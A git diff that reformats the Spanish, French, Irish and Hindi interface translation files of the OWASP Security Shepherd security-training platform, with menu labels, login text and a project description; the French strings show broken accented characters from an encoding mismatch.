+generic.text.searchModules = Buscar módulos
+generic.text.shepherdVersion = Security Shepherd Version: 3.0
+generic.text.sorryError = Sorry but there was an error
+generic.text.submitResult = Submit Result Key Here
+generic.text.username = Nombre de usario
+generic.text.welcome = Bienvenida
+
+getter.button.nextChallenge = Conseguir el próximo Desafío
+
+
+
+login.text.info = Utilice su <a> <span> Credenciales de Security Shepherd <span> </a> a inicio.
+login.text.regInfo = Registrar la <a href="register.jsp"> <span> Cuenta Security Shepherd </ span> </a> aquí!
+login.text.proxy_question = ¿Necesita un proxy?
+login.text.about_blurb = El proyecto OWASP Security Shepherd se ha diseñado e implementado con el objetivo de fomentar y mejorar el conocimiento de seguridad de aplicaciones entre un variado conjunto de habilidades demográfica. Este proyecto permite a los usuarios aprender o mejorar en las habilidades de pruebas de penetración manuales existentes. Esto se logra a través de técnicas de lecciones y de desafío. Una lección proporciona al usuario una gran cantidad de ayuda en la realización de ese módulo, donde un desafío pone lo que el usuario aprendido en la lección de usar. </ P> <p> La OWASP Security Shepherd proyecto abarca los diez primeros OWASP riesgos de aplicaciones web y también cubre los diez riesgos móviles OWASP también. El uso de estos riesgos como un banco de pruebas desafío, las vulnerabilidades de seguridad comunes pueden ser explorados y su impacto en un sistema entendidos. Muchos de estos niveles incluyen mitigaciones insuficientes y protecciones a estos riesgos, como los filtros de la lista negra, esquemas de codificación atroces, los mecanismos de seguridad de barbarie y de la configuración de seguridad pobres. Los módulos han sido concebidos para ofrecer no sólo un reto para un novato de seguridad, pero los profesionales de seguridad también.
+login.text.download_proxy = Descarga un Proxy HTTP aquí
+login.link.zap_win = ZAP para Windows
+login.link.zap_lin = ZAP para Linux
+login.link.zap_mac = ZAP para Mac
+login.text.sponsers = Los patrocinadores del proyecto
+login.text.sponsers_blurb = TEl proyecto OWASP Security Shepherd desea reconocer y agradecer el generoso apoyo de nuestros patrocinadores. Por favor revise sus páginas web y seguirlos en Twitter.
+login.text.thanks = La OWASP Security Shepherd Proyecto también quisiera agradecer al Dr. Anthony Keane y el laboratorio de investigación de la ITB de Seguridad para acoger al público https://owasp.securityShepherd.eu
+getStarted.text.lets_start = Empecemos
\ No newline at end of file
diff --git a/src/main/resources/i18n/text_fr.properties b/src/main/resources/i18n/text_fr.properties
index d95651c31..19b11df02 100644
--- a/src/main/resources/i18n/text_fr.properties
+++ b/src/main/resources/i18n/text_fr.properties
@@ -1,77 +1,84 @@
-generic.text.aboutSecShep=A Propos de Security Shepherd
-generic.text.admin=Admin
-generic.text.cheat=Cheat
-generic.text.challenges=Challenges
-generic.text.configuration=Configuration
-generic.text.configureShepherd=Configurer Shepherd
-generic.text.confirmPasswd=Confirmer le Mot de Passe
-generic.text.confirmEmailAddr=Confirmer l'Email
-generic.text.emailAddr=Adresse Email
-generic.text.lessons=Le�ons
-generic.text.login=Connexion
-generic.text.logout=D�connexion
-generic.text.loading=Chargement...
-generic.text.ssRegister=OWASP Security Shepherd - Register
-generic.text.password=Mot de Passe
-generic.text.pleaseWait=Veuillez Attendre !
-generic.text.register=Enregistrer
-generic.text.scoreboard=Tableau de Bord
-generic.text.submit=Soumettre
-generic.text.username=Nom d'Utilisateur
-generic.text.welcome=Bienvenue
-getter.button.nextChallenge=Challenge Suivant
-getStarted.text.lets_start=Commen�ons
-getStarted.button.openLevels.all=Ouvrir Tous les Niveaux
-getStarted.button.openLevels.web=Ouvrrir les Niveaux WebApp Uniquement
-getStarted.button.openLevels.mobile=Ouvrir les Niveaux Mobile Uniquement
-getStarted.button.closeLevels=Fermer Tous les Niveaux
-blockedMessage.text.heading.levelBlocked=Niveau Actuellement Bloqu�
-index.link.admin.cheatSheet.manage=G�rer les Cheat Sheets
-index.link.admin.cheatSheet.manage.create=Cr�er une Nouvelle Cheat Sheet
-index.link.admin.cheatSheet.manage.disable=D�sactiver les Cheat Sheets
-index.link.admin.cheatSheet.manage.enable=Activer les Cheat Sheets
-index.link.admin.config.change=Changer la Disposition du Module
-index.link.admin.config.feedback=Configuration des Feedbacks
-index.link.admin.config.openClose=Ouvrir/Fermer les Inscriptions
-index.link.admin.config.scoreboard=Configuration du Tableau du Bord
-index.link.admin.config.coreDb=Installer la Base de Donn�es Centrale
-index.link.admin.moduleManage=Gestion des Modules
-index.link.admin.moduleManage.block=Pr�f�rences de Blocage des Modules
-index.link.admin.moduleManage.openClose=Ouvrir et Fermer des Modules
-index.link.admin.moduleManage.openCloseCategory=Ouvrir et Fermer par Cat�gorie
-index.link.admin.moduleManage.feedback=Voir les Feedbacks
-index.link.admin.moduleManage.progress=Voir les Progr�s
-index.link.admin.userMange=Gestion des Utilisateurs
-index.link.admin.userMange.addPlayer=Ajouter des Joueurs
-index.link.admin.userMange.addPoints=Ajouter/D�duire des Points aux Joueurs
-index.link.admin.userMange.assignPlayer=Assigner des Joueurs � une Classe
-index.link.admin.userMange.createClass=Cr�er une Classe
-index.link.admin.userMange.createAdmin=Cr�er un Nouvel Admin
-index.link.admin.userMange.resetPass=R�initialiser le mot de passe
-index.link.admin.userMange.setDefaultPlayerClass=Configurer une Classe par D�faut
-index.link.admin.userMange.suspendPlayer=Suspendre le Joueur
-index.link.admin.userMange.unsuspendPlayer=Annuler la Suspension du Joueur
-index.link.admin.userMange.upgradeToAdmin=Promouvoir le Joueur en Admin
-login.text.sponsers=Sponsors du Projet
-readyToPlay.title.readyToPlay=Security Shepherd - Pr�t ?
-readyToPlay.header.notReady=Vous n'�tes pas pr�t !
-readyToPlay.title.enteredGame=Vous �tes entr� dans le jeu !
-login.text.proxy_question=Avez-vous besoin d'un proxy ?
-login.text.download_proxy=T�l�charger un proxy HTTP
-login.link.zap_win=ZAP pour Windows
-login.link.zap_lin=ZAP pour Linux
-login.link.zap_mac=ZAP pour Mac
-blockedMessage.text.info.levelBlocked=Un administrateur a ferm� ce niveau. Pour savoir quand il sera disponible, veuillez vous adressez � la personne en charge de l'application.
-getStarted.text.moduleInfo.openFloor=Maintenant que vous �tes connect�s, commen�ons avec quelques modules ! Pour en commencez un, cliquez sur un ent�te, tel que <span><a>Lessons</a></span> ou <span><a>Modules</a></span>, dans le menu lat�ral pour voir quels modules sont actuellement disponibles !
-getStarted.text.moduleInfo.incrementalFloor=Maintenant que vous �tes connect�s, commen�ons avec quelques challenges ! Pour en commencer un, cliquez sur le bouton &quot;Challenge Suivant&quot; sur la gauche !
-getStarted.text.moduleInfo=Maintenant que vous �tes connect�s, commen�ons avec quelques modules ! Pour en commencer un, cliquez sur un ent�te, tel que <span><a>Field Training</a></span> ou <span><a>Corporal</a></span>, dans le menu lat�ral pour voir quels modules sont actuellement disponibles ! Plus le module est bas dans le menu, plus il vaut de points !
-getStarted.text.configureShepherd.asAnAdmin=En tant qu'administrateur, vous pouvez d�finir la port�e de Security Shepherd. Vous pouvez facilement changer la disposition du jeu en Web ou Mobile Application avec les boutons suivants. Vous pouvez aussi ouvrir le panel administrateur, dans le coin en haut � gauche de la page, pour ouvrir ou fermer des sujets sp�cifiques.
-getStarted.text.checkShepConfigMsg=Si vous ne pouvez pas voir le message sous ce paragraphe, merci de vous assurer que l'instance Security Shepherd est correctement configur�e.
-getStarted.text.info.changePassword=Votre mot de passe est temporaire. Cela signifie que quelqu'un d'autre le connait ! Changez le maintenant pour plus de s�curit� !
-login.text.info=Utilisez vos <a><span>informations d'identification Security Shepherd</span></a> pour vous connecter.
-login.text.regInfo=Enregistrer un <a href="register.jsp"><span>compte Security Shepherd</span></a> ici !
-login.text.about_blurb=OWASP Security Shepherd Project a �t� con�u et d�velopp� avec pour objectif de favoriser et am�liorer la sensibilit� � la s�curit� des applications sur un ensemble vari� de comp�tences. Ce projet permet aux utilisateurs d'apprendre et d'am�liorer leur aptitudes en tests d'intrusion. Cela est r�aliser au travers de le�ons et challenges techniques. Les le�ons aident les utilisateurs � finir un module tandis que les challenges permettent de mettre en pratique les acquis.</p><p>OWASP Security Shepherd Project couvre les Top 10 WebApp Risks et Modile Risks de l'OWASP. En utilisant ces risques comme base d'apprentissage, les failles de s�curit� les plus communes peuvent �tre explor�es et leur impact mieux compris. Beaucoup de ces niveaux inclus des protections insuffisantes et des corrections partielles, telles que des filtrages par blacklist, des mauvaises configurations et des m�thodes de codage atroces. Ces challenges ont �t� con�u pour les professionnels autant que pour les �tudiants.
-login.text.sponsers_blurb=OWASP Security Shepherd Project reconna�t aussi avec gratitude le soutien apport� par nos sponsors. Nous vous encourageons � visiter leur site web et � les suivre sur Twitter.
-login.text.thanks=OWASP Security Shepherd Project tient � remercier Dr. Anthony Keane et ITB Security Research Lab pour leur h�bergement de https://owasp.securityShepherd.eu
-readyToPlay.text.info.notReady=Rafra�chissez la page d'accueil ! Si cette erreur persiste, essayez de vous reconnecter. Si cela ne r�soud pas le probl�me, contactez un administrateur !
-readyToPlay.text.info.enteredGame=Maintenant que vous pouvez voir ce message vous �tes pr�t ! Commencez � lire les le�ons et � r�soudre les challenges !<br/><br/> Souvenez-vous, les niveaux sont des sous-applications. Gardez le jeu dans ces applications ! Les ID de session n'en font pas partie ! Vous ne feriez que vous d�connecter vous-m�mes !<br/><br/>Si vous n'avez pas encore configur� un proxy web, vous devriez. Cela vous sera particuli�rement utile !
+generic.text.aboutSecShep = A Propos de Security Shepherd
+generic.text.admin = Admin
+generic.text.cheat = Cheat
+generic.text.challenges = Challenges
+generic.text.configuration = Configuration
+generic.text.configureShepherd = Configurer Shepherd
+generic.text.confirmPasswd = Confirmer le Mot de Passe
+generic.text.confirmEmailAddr = Confirmer l'Email
+generic.text.emailAddr = Adresse Email
+generic.text.lessons = Le�ons
+generic.text.login = Connexion
+generic.text.logout = D�connexion
+generic.text.loading = Chargement...
+generic.text.ssRegister = OWASP Security Shepherd - Register
+generic.text.password = Mot de Passe
+generic.text.pleaseWait = Veuillez Attendre !
+generic.text.register = Enregistrer
+generic.text.scoreboard = Tableau de Bord
+generic.text.submit = Soumettre
+generic.text.username = Nom d'Utilisateur
+generic.text.welcome = Bienvenue
+
+getter.button.nextChallenge = Challenge Suivant
+
+
+getStarted.text.lets_start = Commen�ons
+getStarted.button.openLevels.all = Ouvrir Tous les Niveaux
+getStarted.button.openLevels.web = Ouvrrir les Niveaux WebApp Uniquement
+getStarted.button.openLevels.mobile = Ouvrir les Niveaux Mobile Uniquement
+getStarted.button.closeLevels = Fermer Tous les Niveaux
+blockedMessage.text.heading.levelBlocked = Niveau Actuellement Bloqu�
+index.link.admin.cheatSheet.manage = G�rer les Cheat Sheets
+index.link.admin.cheatSheet.manage.create = Cr�er une Nouvelle Cheat Sheet
+index.link.admin.cheatSheet.manage.disable = D�sactiver les Cheat Sheets
+index.link.admin.cheatSheet.manage.enable = Activer les Cheat Sheets
+index.link.admin.config.change = Changer la Disposition du Module
+index.link.admin.config.feedback = Configuration des Feedbacks
+index.link.admin.config.openClose = Ouvrir/Fermer les Inscriptions
+index.link.admin.config.scoreboard = Configuration du Tableau du Bord
+index.link.admin.config.coreDb = Installer la Base de Donn�es Centrale
+index.link.admin.moduleManage = Gestion des Modules
+index.link.admin.moduleManage.block = Pr�f�rences de Blocage des Modules
+index.link.admin.moduleManage.openClose = Ouvrir et Fermer des Modules
+index.link.admin.moduleManage.openCloseCategory = Ouvrir et Fermer par Cat�gorie
+index.link.admin.moduleManage.feedback = Voir les Feedbacks
+index.link.admin.moduleManage.progress = Voir les Progr�s
+index.link.admin.userMange = Gestion des Utilisateurs
+index.link.admin.userMange.addPlayer = Ajouter des Joueurs
+index.link.admin.userMange.addPoints = Ajouter/D�duire des Points aux Joueurs
+index.link.admin.userMange.assignPlayer = Assigner des Joueurs � une Classe
+index.link.admin.userMange.createClass = Cr�er une Classe
+index.link.admin.userMange.createAdmin = Cr�er un Nouvel Admin
+index.link.admin.userMange.resetPass = R�initialiser le mot de passe
+index.link.admin.userMange.setDefaultPlayerClass = Configurer une Classe par D�faut
+index.link.admin.userMange.suspendPlayer = Suspendre le Joueur
+index.link.admin.userMange.unsuspendPlayer = Annuler la Suspension du Joueur
+index.link.admin.userMange.upgradeToAdmin = Promouvoir le Joueur en Admin
+login.text.sponsers = Sponsors du Projet
+readyToPlay.title.readyToPlay = Security Shepherd - Pr�t ?
+readyToPlay.header.notReady = Vous n'�tes pas pr�t !
+readyToPlay.title.enteredGame = Vous �tes entr� dans le jeu !
+login.text.proxy_question = Avez-vous besoin d'un proxy ?
+login.text.download_proxy = T�l�charger un proxy HTTP
+
+
+login.link.zap_win = ZAP pour Windows
+login.link.zap_lin = ZAP pour Linux
+login.link.zap_mac = ZAP pour Mac
+
+
+blockedMessage.text.info.levelBlocked = Un administrateur a ferm� ce niveau. Pour savoir quand il sera disponible, veuillez vous adressez � la personne en charge de l'application.
+getStarted.text.moduleInfo.openFloor = Maintenant que vous �tes connect�s, commen�ons avec quelques modules ! Pour en commencez un, cliquez sur un ent�te, tel que <span><a>Lessons</a></span> ou <span><a>Modules</a></span>, dans le menu lat�ral pour voir quels modules sont actuellement disponibles !
+getStarted.text.moduleInfo.incrementalFloor = Maintenant que vous �tes connect�s, commen�ons avec quelques challenges ! Pour en commencer un, cliquez sur le bouton &quot;Challenge Suivant&quot; sur la gauche !
+getStarted.text.moduleInfo = Maintenant que vous �tes connect�s, commen�ons avec quelques modules ! Pour en commencer un, cliquez sur un ent�te, tel que <span><a>Field Training</a></span> ou <span><a>Corporal</a></span>, dans le menu lat�ral pour voir quels modules sont actuellement disponibles ! Plus le module est bas dans le menu, plus il vaut de points !
+getStarted.text.configureShepherd.asAnAdmin = En tant qu'administrateur, vous pouvez d�finir la port�e de Security Shepherd. Vous pouvez facilement changer la disposition du jeu en Web ou Mobile Application avec les boutons suivants. Vous pouvez aussi ouvrir le panel administrateur, dans le coin en haut � gauche de la page, pour ouvrir ou fermer des sujets sp�cifiques.
+getStarted.text.checkShepConfigMsg = Si vous ne pouvez pas voir le message sous ce paragraphe, merci de vous assurer que l'instance Security Shepherd est correctement configur�e.
+getStarted.text.info.changePassword = Votre mot de passe est temporaire. Cela signifie que quelqu'un d'autre le connait ! Changez le maintenant pour plus de s�curit� !
+login.text.info = Utilisez vos <a><span>informations d'identification Security Shepherd</span></a> pour vous connecter.
+login.text.regInfo = Enregistrer un <a href="register.jsp"><span>compte Security Shepherd</span></a> ici !
+login.text.about_blurb = OWASP Security Shepherd Project a �t� con�u et d�velopp� avec pour objectif de favoriser et am�liorer la sensibilit� � la s�curit� des applications sur un ensemble vari� de comp�tences. Ce projet permet aux utilisateurs d'apprendre et d'am�liorer leur aptitudes en tests d'intrusion. Cela est r�aliser au travers de le�ons et challenges techniques. Les le�ons aident les utilisateurs � finir un module tandis que les challenges permettent de mettre en pratique les acquis.</p><p>OWASP Security Shepherd Project couvre les Top 10 WebApp Risks et Modile Risks de l'OWASP. En utilisant ces risques comme base d'apprentissage, les failles de s�curit� les plus communes peuvent �tre explor�es et leur impact mieux compris. Beaucoup de ces niveaux inclus des protections insuffisantes et des corrections partielles, telles que des filtrages par blacklist, des mauvaises configurations et des m�thodes de codage atroces. Ces challenges ont �t� con�u pour les professionnels autant que pour les �tudiants.
+login.text.sponsers_blurb = OWASP Security Shepherd Project reconna�t aussi avec gratitude le soutien apport� par nos sponsors. Nous vous encourageons � visiter leur site web et � les suivre sur Twitter.
+login.text.thanks = OWASP Security Shepherd Project tient � remercier Dr. Anthony Keane et ITB Security Research Lab pour leur h�bergement de https://owasp.securityShepherd.eu
+readyToPlay.text.info.notReady = Rafra�chissez la page d'accueil ! Si cette erreur persiste, essayez de vous reconnecter. Si cela ne r�soud pas le probl�me, contactez un administrateur !
+readyToPlay.text.info.enteredGame = Maintenant que vous pouvez voir ce message vous �tes pr�t ! Commencez � lire les le�ons et � r�soudre les challenges !<br/><br/> Souvenez-vous, les niveaux sont des sous-applications. Gardez le jeu dans ces applications ! Les ID de session n'en font pas partie ! Vous ne feriez que vous d�connecter vous-m�mes !<br/><br/>Si vous n'avez pas encore configur� un proxy web, vous devriez. Cela vous sera particuli�rement utile !
diff --git a/src/main/resources/i18n/text_ga.properties b/src/main/resources/i18n/text_ga.properties
index f7b29bcd5..ecd6ba01f 100644
--- a/src/main/resources/i18n/text_ga.properties
+++ b/src/main/resources/i18n/text_ga.properties
@@ -1,77 +1,80 @@
-generic.text.aboutSecShep=Faoi Security Shepherd
-generic.text.admin=Riarachán
-generic.text.cheat=Aicearra
-generic.text.challenges=Dúshlán
-generic.text.commentMessage.1=You are currently looking at the core server. (Translation Required)
-generic.text.commentMessage.2=Nothing related to the levels in Security Shepherd will be found in here. (Translation Required)
-generic.text.commentMessage.3=You might be looking for the iframe embedded in the page. (Translation Required)
-generic.text.commentMessage.4=Try a tool like Firebug to make this stuff easier. (Translation Required)
-generic.text.configuration=Cumraíocht
-generic.text.configureShepherd=Cumraigh Shepherd
-generic.text.confirmPasswd=Deimhnigh Pasfhocal
-generic.text.confirmEmailAddr=Deimhnigh Ríomhphost
-generic.text.emailAddr=Ríomhphost
-generic.text.lessons=Ceachtanna
-generic.text.login=Cuír isteach 
-generic.text.logout=logáil Amach
-generic.text.loading=Ag Luchtú...
-generic.text.ssRegister=OWASP Security Shepherd - Register
-generic.text.password=Focal Faire
-generic.text.pleaseWait=Déan Teagmháil Linn!
-generic.text.register=Cláraigh
-generic.text.scoreboard=Scórchlár
-generic.text.searchModules=Search Modules (Translation Required)
-generic.text.shepherdVersion=Security Shepherd Version: 3.0
-generic.text.sorryError=Sorry but there was an error
-generic.text.submitResult=Submit Result Key Here
-generic.text.submit=Cúir Isteach
-generic.text.username=Ainm Úsáideora
-generic.text.welcome=Fáilte
-getter.button.nextChallenge=Faigh an Chéad Dúshlán Eile
-login.label.info=Bain úsáid as do <a><span>Dintiúir Security Shepherd</span></a> a Logáil isteach. 
-login.label.regInfo=Cláraigh <a href="register.jsp"><span>Cuntas Security Shepherd</span></a> anseo! 
-login.label.proxy_question=Gá duit seachfhreastalaí?
-login.label.about_blurb=Tá an tionscadal OWASP Security Shepherd Dearadh agus cuireadh i bhfeidhm leis an aidhm a chothú agus feasacht slándála i bhfeidhm i measc scil-leagtar tionscadal éagsúil demographic.This fheabhsú ar chumas úsáideoirí a fhoghlaim nó a fheabhsú ar scileanna tástála treá láimhe atá ann cheana féin. Seo i gcrích trí theicnící cheachta agus dúshlán. Soláthraíonn ceacht úsáideoir le go leor de chabhair i gcrích go mhodúl, i gcás ina gcuireann dúshlán cad é an t-úsáideoir a foghlaimíodh sa cheacht a úsáid.</p><p>Clúdaíonn an tionscadal OWASP Slándáil Aoire na rioscaí app gréasáin OWASP Top Ten agus clúdaíonn an OWASP Top Ten Soghluaiste rioscaí chomh maith. Ag baint úsáide as na rioscaí mar leaba tástála dúshlán, is féidir le leochaileachtaí slándála a iniúchadh agus a dtionchar ar chóras thuiscint. I measc go leor de na leibhéil nach leor mhaoluithe agus cosaintí ar na rioscaí, ar nós scagairí blacklist, scéimeanna ionchódú atrocious, meicníochtaí slándála barbaric agus cumraíocht slándála bochta. Na modúil a crafted chun ní hamháin dúshlán do novice slándála, ach gairmithe slándála chomh maith a chur ar fáil.
-login.label.download_proxy=Íoslódáil Seachfhreastalaí HTTP anseo
-login.label.zap_win=ZAP do Windows
-login.label.zap_lin=ZAP do Linux
-login.label.zap_mac=ZAP do Mac
-login.label.sponsers=Urraitheoirí tionscadal
-login.label.sponsers_blurb=Ba mhaith leis an tionscadal OWASP Slándáil Shepherd buíochas a ghabháil agus a ghabháil leis an tacaíocht fhlaithiúil dár urraitheoirí. Déan seiceáil amach a leathanaigh ghréasáin agus iad a leanúint ar twitter.
-login.label.thanks=Ba mhaith leis an Tionscadal Shepherd OWASP Slándáil buíochas a ghabháil le Dr Anthony Keane agus an Taighde ITB Slándáil Saotharlann chun óstáil an bpobal https://owasp.securityShepherd.eu freisin!
-getStarted.label.lets_start=Lig dúinn Tosaigh
-index.label.welcome=Fáilte
-index.label.logout=Logála Amach
-index.button.admin=Riarachán
-index.link.admin.cheatSheet.manage=Bainistíocht Leathanach Leideanna
-index.link.admin.cheatSheet.manage.create=Cruthaigh Leathanach Leideanna Nua
-index.link.admin.cheatSheet.manage.disable=Dichumasaigh Leathanach Leideanna
-index.link.admin.cheatSheet.manage.enable=Ar chumas Leathanach Leideanna
-index.link.admin.config=Cumraíocht
-index.link.admin.config.about=Maidir Security Shepherd
-index.link.admin.config.change=Athrú Modúl Leagan Amach
-index.link.admin.config.feedback=Cumraíocht Aiseolais
-index.link.admin.config.openClose=Oscail/Dún Chlárúcháin
-index.link.admin.config.scoreboard=Clár Scór Cumraíocht
-index.link.admin.config.coreDb=Bunachar Sonraí Lárnach a Leagtar
-index.link.admin.moduleManage=Bainistíocht modúl
-index.link.admin.moduleManage.block=Modúl Bloc Socrú
-index.link.admin.moduleManage.openClose=Modúil Oscailte agus Dún
-index.link.admin.moduleManage.openCloseCategory=Oscailte nó Dún réir Catagóire
-index.link.admin.moduleManage.feedback=Féach ar Aiseolas
-index.link.admin.moduleManage.progress=Féach ar Dhul Chun Cinn
-index.link.admin.userMange=Bainistíocht Úsáideoir
-index.link.admin.userMange.addPlayer=Cuir le Imreoir
-index.link.admin.userMange.addPoints=Cuir le / Asbhain Pointí Imreoir
-index.link.admin.userMange.assignPlayer=Imreoir go Rang a Shannadh
-index.link.admin.userMange.createClass=Cruthaigh Rang
-index.link.admin.userMange.createAdmin=Cruthaigh Riarachán Nua
-index.link.admin.userMange.resetPass=Pasfhocal a Athshocrú
-index.link.admin.userMange.setDefaultPlayerClass=Socraigh Réamhshocrú Imreoir Rang
-index.link.admin.userMange.suspendPlayer=Fionraí Imreoir
-index.link.admin.userMange.unsuspendPlayer=Fionraí Imreoir a Chealú
-index.link.admin.userMange.upgradeToAdmin=Imreoir Uasghrádú go Riarachán
-index.button.scoreboard=Clár Scór
-index.button.cheat=Aicearra
-index.button.lessons=Rang
-index.button.challenges=Dúshlán
+generic.text.aboutSecShep = Faoi Security Shepherd
+generic.text.admin = Riarachán
+generic.text.cheat = Aicearra
+generic.text.challenges = Dúshlán
+generic.text.commentMessage.1 = You are currently looking at the core server. (Translation Required)
+generic.text.commentMessage.2 = Nothing related to the levels in Security Shepherd will be found in here. (Translation Required)
+generic.text.commentMessage.3 = You might be looking for the iframe embedded in the page. (Translation Required)
+generic.text.commentMessage.4 = Try a tool like Firebug to make this stuff easier. (Translation Required)
+generic.text.configuration = Cumraíocht
+generic.text.configureShepherd = Cumraigh Shepherd
+generic.text.confirmPasswd = Deimhnigh Pasfhocal
+generic.text.confirmEmailAddr = Deimhnigh Ríomhphost
+generic.text.emailAddr = Ríomhphost
+generic.text.lessons = Ceachtanna
+generic.text.login = Cuír isteach 
+generic.text.logout = logáil Amach
+generic.text.loading = Ag Luchtú...
+generic.text.ssRegister = OWASP Security Shepherd - Register
+generic.text.password = Focal Faire
+generic.text.pleaseWait = Déan Teagmháil Linn!
+generic.text.register = Cláraigh
+generic.text.scoreboard = Scórchlár
+generic.text.searchModules = Search Modules (Translation Required)
+generic.text.shepherdVersion = Security Shepherd Version: 3.0
+generic.text.sorryError = Sorry but there was an error
+generic.text.submitResult = Submit Result Key Here
+generic.text.submit = Cúir Isteach
+generic.text.username = Ainm Úsáideora
+generic.text.welcome = Fáilte
+
+getter.button.nextChallenge = Faigh an Chéad Dúshlán Eile
+
+
+login.label.info = Bain úsáid as do <a><span>Dintiúir Security Shepherd</span></a> a Logáil isteach. 
+login.label.regInfo = Cláraigh <a href="register.jsp"><span>Cuntas Security Shepherd</span></a> anseo! 
+login.label.proxy_question = Gá duit seachfhreastalaí?
+login.label.about_blurb  = Tá an tionscadal OWASP Security Shepherd Dearadh agus cuireadh i bhfeidhm leis an aidhm a chothú agus feasacht slándála i bhfeidhm i measc scil-leagtar tionscadal éagsúil demographic.This fheabhsú ar chumas úsáideoirí a fhoghlaim nó a fheabhsú ar scileanna tástála treá láimhe atá ann cheana féin. Seo i gcrích trí theicnící cheachta agus dúshlán. Soláthraíonn ceacht úsáideoir le go leor de chabhair i gcrích go mhodúl, i gcás ina gcuireann dúshlán cad é an t-úsáideoir a foghlaimíodh sa cheacht a úsáid.</p><p>Clúdaíonn an tionscadal OWASP Slándáil Aoire na rioscaí app gréasáin OWASP Top Ten agus clúdaíonn an OWASP Top Ten Soghluaiste rioscaí chomh maith. Ag baint úsáide as na rioscaí mar leaba tástála dúshlán, is féidir le leochaileachtaí slándála a iniúchadh agus a dtionchar ar chóras thuiscint. I measc go leor de na leibhéil nach leor mhaoluithe agus cosaintí ar na rioscaí, ar nós scagairí blacklist, scéimeanna ionchódú atrocious, meicníochtaí slándála barbaric agus cumraíocht slándála bochta. Na modúil a crafted chun ní hamháin dúshlán do novice slándála, ach gairmithe slándála chomh maith a chur ar fáil.
+login.label.download_proxy = Íoslódáil Seachfhreastalaí HTTP anseo
+login.label.zap_win = ZAP do Windows
+login.label.zap_lin = ZAP do Linux
+login.label.zap_mac = ZAP do Mac
+login.label.sponsers = Urraitheoirí tionscadal
+login.label.sponsers_blurb = Ba mhaith leis an tionscadal OWASP Slándáil Shepherd buíochas a ghabháil agus a ghabháil leis an tacaíocht fhlaithiúil dár urraitheoirí. Déan seiceáil amach a leathanaigh ghréasáin agus iad a leanúint ar twitter.
+login.label.thanks = Ba mhaith leis an Tionscadal Shepherd OWASP Slándáil buíochas a ghabháil le Dr Anthony Keane agus an Taighde ITB Slándáil Saotharlann chun óstáil an bpobal https://owasp.securityShepherd.eu freisin!
+getStarted.label.lets_start = Lig dúinn Tosaigh
+index.label.welcome = Fáilte
+index.label.logout = Logála Amach
+index.button.admin = Riarachán
+index.link.admin.cheatSheet.manage = Bainistíocht Leathanach Leideanna
+index.link.admin.cheatSheet.manage.create = Cruthaigh Leathanach Leideanna Nua
+index.link.admin.cheatSheet.manage.disable = Dichumasaigh Leathanach Leideanna
+index.link.admin.cheatSheet.manage.enable = Ar chumas Leathanach Leideanna
+index.link.admin.config = Cumraíocht
+index.link.admin.config.about = Maidir Security Shepherd
+index.link.admin.config.change = Athrú Modúl Leagan Amach
+index.link.admin.config.feedback = Cumraíocht Aiseolais
+index.link.admin.config.openClose = Oscail/Dún Chlárúcháin
+index.link.admin.config.scoreboard = Clár Scór Cumraíocht
+index.link.admin.config.coreDb = Bunachar Sonraí Lárnach a Leagtar
+index.link.admin.moduleManage = Bainistíocht modúl
+index.link.admin.moduleManage.block = Modúl Bloc Socrú
+index.link.admin.moduleManage.openClose = Modúil Oscailte agus Dún
+index.link.admin.moduleManage.openCloseCategory = Oscailte nó Dún réir Catagóire
+index.link.admin.moduleManage.feedback = Féach ar Aiseolas
+index.link.admin.moduleManage.progress = Féach ar Dhul Chun Cinn
+index.link.admin.userMange = Bainistíocht Úsáideoir
+index.link.admin.userMange.addPlayer = Cuir le Imreoir
+index.link.admin.userMange.addPoints = Cuir le / Asbhain Pointí Imreoir
+index.link.admin.userMange.assignPlayer = Imreoir go Rang a Shannadh
+index.link.admin.userMange.createClass = Cruthaigh Rang
+index.link.admin.userMange.createAdmin = Cruthaigh Riarachán Nua
+index.link.admin.userMange.resetPass = Pasfhocal a Athshocrú
+index.link.admin.userMange.setDefaultPlayerClass = Socraigh Réamhshocrú Imreoir Rang
+index.link.admin.userMange.suspendPlayer = Fionraí Imreoir
+index.link.admin.userMange.unsuspendPlayer = Fionraí Imreoir a Chealú
+index.link.admin.userMange.upgradeToAdmin = Imreoir Uasghrádú go Riarachán
+index.button.scoreboard = Clár Scór
+index.button.cheat = Aicearra
+index.button.lessons = Rang
+index.button.challenges = Dúshlán
diff --git a/src/main/resources/i18n/text_hi.properties b/src/main/resources/i18n/text_hi.properties
index fae95ef7a..99ceeb414 100644
--- a/src/main/resources/i18n/text_hi.properties
+++ b/src/main/resources/i18n/text_hi.properties
@@ -1,99 +1,105 @@
-generic.text.aboutSecShep=About Security Shepherd
-generic.text.admin=Admin
-generic.text.cheat=Cheat
-generic.text.challenges=Chunauti
-generic.text.commentMessage.1=Aap currently core server per dekh rahe ho. 
-generic.text.commentMessage.2=Yaha pe tumhare liye Security Shepherd  par koi level related mahiti nahi he!. 
-generic.text.commentMessage.3=Tum Shayad is page par embedded iframe khoj rahe ho. 
-generic.text.commentMessage.4=Is tool ko firebug ki tarah use kro aur simple banao.
-generic.text.configuration=Configuration
-generic.text.configureShepherd=Configure Shepherd
-generic.text.confirmPasswd=Confirm Password
-generic.text.confirmEmailAddr=Confirm Email
-generic.text.emailAddr=Email Address
-generic.text.lessons=Lessons
-generic.text.login=Login
-generic.text.logout=Logout
-generic.text.loading=Loading...
-generic.text.ssRegister=OWASP Security Shepherd - Register
-generic.text.password=Password
-generic.text.pleaseWait=Please Wait!
-generic.text.register=Register
-generic.text.scoreboard=Scoreboard
-generic.text.searchModules=Search Modules
-generic.text.shepherdVersion=Security Shepherd Version: 2.4
-generic.text.sorryError=Sorry yahape error payi gayi he
-generic.text.submitResult=Result Key yaha pe submit karo
-generic.text.submit=Submit
-generic.text.username=Username
-generic.text.welcome=Welcome
-getter.button.completed=Completed
-getter.button.nextChallenge=Get Next Challenge
-getter.button.finished=Tumhne pura kiya!
-getter.button.noModulesFound=Koi Modules Mil nahi rahe
-getter.tournamentRank.1=Field Training
-getter.tournamentRank.2=Private
-getter.tournamentRank.3=Corporal
-getter.tournamentRank.4=Sergeant
-getter.tournamentRank.5=Lieutenant
-getter.tournamentRank.6=Major
-getter.tournamentRank.7=Admiral
-getStarted.text.lets_start=Let's Get Started
-getStarted.button.openLevels.all=Open All Levels
-getStarted.button.openLevels.web=Open Web App Levels Only
-getStarted.button.openLevels.mobile=Open Mobile Levels Only
-getStarted.button.closeLevels=Close All Levels
-blockedMessage.text.heading.levelBlocked=Level Currently Blocked
-index.link.admin.cheatSheet.manage=Cheat Sheet Management
